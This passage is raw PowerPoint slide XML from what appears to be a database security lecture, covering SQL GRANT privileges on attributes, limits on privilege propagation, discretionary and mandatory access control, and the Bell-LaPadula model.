              <a:t> to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update only the SALARY attribute of EMPLOYEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="240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A1 can issue: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altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>    GRANT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UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> ON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EMPLOYEE (SALARY) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege can specify particular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attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> that may be updated or inserted in a relation.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privileges (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SELECT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DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>) are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not attribute specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36869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8700" y="4891088"/>
            <a:ext cx="1157288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063" y="4891088"/>
            <a:ext cx="105886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向右箭號 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3617913" y="5334000"/>
            <a:ext cx="1430337" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50006"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00CC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36872" name="矩形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3627438" y="5438775"/>
            <a:ext cx="1373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update on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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EMPLOYEE(SALARY)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr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2732088" y="5994400"/>
            <a:ext cx="49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A1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36874" name="矩形 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5449888" y="6002338"/>
            <a:ext cx="498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A4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36875" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3894138" y="5045075"/>
            <a:ext cx="923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GRANT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39150" y="6386513"/>
            <a:ext cx="619125" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5CC8E5F0-BCAE-49E0-89AA-932B5A3F8733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2.6 Specifying Limits on Propagation of Privileges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200150"/>
            <a:ext cx="8535987" cy="32956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Techniques to limit the propagation of privileges have been developed, although they have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not yet been implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>in most DBMSs and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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> a part of SQL.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Limiting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horizontal propagation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integer number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means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that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an account B given the GRANT OPTION can grant the privilege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at most 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other accounts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Vertical propagation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more complicated; it limits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depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> of the granting of privileges.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1054100" y="4986338"/>
            <a:ext cx="866775" cy="57626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37894" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="995363" y="4662488"/>
            <a:ext cx="561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R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895" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023938" y="5486400"/>
            <a:ext cx="1125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owner A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896" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2327275" y="5062538"/>
            <a:ext cx="450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B</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37897" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1995488" y="5283200"/>
            <a:ext cx="360362" cy="1588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37898" name="直線單箭頭接點 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5759450" y="4949825"/>
            <a:ext cx="414338" cy="303213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37899" name="直線單箭頭接點 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5754688" y="5235575"/>
            <a:ext cx="409575" cy="431800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37900" name="文字方塊 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343650" y="4594225"/>
            <a:ext cx="925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user B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901" name="文字方塊 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6343650" y="5526088"/>
            <a:ext cx="925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user X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902" name="文字方塊 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5935663" y="5018088"/>
            <a:ext cx="1370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…     …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903" name="右大括弧 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7516813" y="4625975"/>
            <a:ext cx="257175" cy="1300163"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41875"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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37904" name="文字方塊 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7888288" y="4994275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baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" i="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37905" name="矩形 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024063" y="4743450"/>
            <a:ext cx="269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i="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37906" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4779963" y="4948238"/>
            <a:ext cx="866775" cy="576262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37907" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4721225" y="4624388"/>
            <a:ext cx="561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R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908" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4749800" y="5448300"/>
            <a:ext cx="1125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owner A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37909" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="5037138"/>
            <a:ext cx="452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C</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37910" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2636838" y="5267325"/>
            <a:ext cx="576262" cy="1588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37911" name="矩形 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2611438" y="4752975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i="1" baseline="0"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="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37912" name="文字方塊 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3808413" y="4997450"/>
            <a:ext cx="514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ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>…  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37913" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3481388" y="5262563"/>
            <a:ext cx="360362" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg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19473E-75E8-4FFB-8C28-1006D275703A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charset="-120"/>
              </a:rPr>
              <a:t>Chapter Outline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303338"/>
            <a:ext cx="8048625" cy="49974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Introduction to Database Security Issues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Discretionary Access Control Based on Granting Revoking Privileges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Mandatory Access Control and Role-Based Access Control for Multilevel Security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SQL Injection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Introduction to Statistical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Introduction to Flow Control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Encryption and Public Key Infrastructures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Privacy Issues and Preservation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Challenges of Database Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="Arial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charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oracle Label-Based Security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6EB1E03-78B6-482E-AA8B-1B37E451C45F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>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3 Mandatory Access Control and Role-Based Access Control for Multilevel Security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143000"/>
            <a:ext cx="8343900" cy="2465614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The discretionary access control is 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all-or-nothing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>method.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user either has or does not have a certain privilege.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In many applications, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>additional security policy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needed that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classifies data and users based on security classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>. This approach as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>mandatory access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, would typically be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>combined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> with the discretionary access control mechanisms.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7" y="3914132"/>
            <a:ext cx="3322637" cy="1250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92" y="3955407"/>
            <a:ext cx="4422775" cy="1114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824591" y="5268140"/>
            <a:ext cx="283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aseline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Discretionary Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="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98613" y="5251812"/>
            <a:ext cx="2661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aseline="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Mandatory Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="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39150" y="6386513"/>
            <a:ext cx="619125" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D0099E50-1082-4BCB-9427-6438E3B60B82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Multilevel Security: Bell-LaPadula Model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847725"/>
            <a:ext cx="8774112" cy="4257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Typical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>security classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> are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top secret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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>),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secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>),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confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>),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unclassified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>), where TS is the highest level and U the lowest: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TS </a:t>
            </a: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≥ S ≥ C ≥ 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b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bell-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LaPadula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> model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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>classifies each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>subject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(user, account, program) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>object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(relation, tuple, column, view, operation) into one of the security classifications, T, S, C, or U. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534987" indent="-268288" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A subject S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not allowed read access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to an object O unless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class(S) ≥ class(O)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. This is known as the </a:t>
            </a:r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simple security property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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534987" indent="-268288" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A subject S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not allowed to write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an object O unless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class(S) ≤ class(O).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This known as the </a:t>
            </a:r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star property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 (or * property).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40965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5153025"/>
            <a:ext cx="11906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5054600"/>
            <a:ext cx="3924300" cy="1266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67" name="矩形 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243013" y="6249988"/>
            <a:ext cx="1463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aseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>class(S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sz="2000" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>): S </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40968" name="矩形 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4171950" y="5095875"/>
            <a:ext cx="1385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baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>class(O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sz="1600" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>): TS </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40969" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3938588" y="6283325"/>
            <a:ext cx="1282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baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>class(O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1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sz="1600" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>): C </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40970" name="Picture 4" descr="j01953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180013"/>
            <a:ext cx="10604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1" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6797675" y="6245225"/>
            <a:ext cx="149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aseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>class(S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sz="2000" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>): C 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44825B-71E1-4B1C-9FF1-1FFBF5F3FE81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Multilevel Security for A Relation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98538"/>
            <a:ext cx="8469312" cy="4346575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
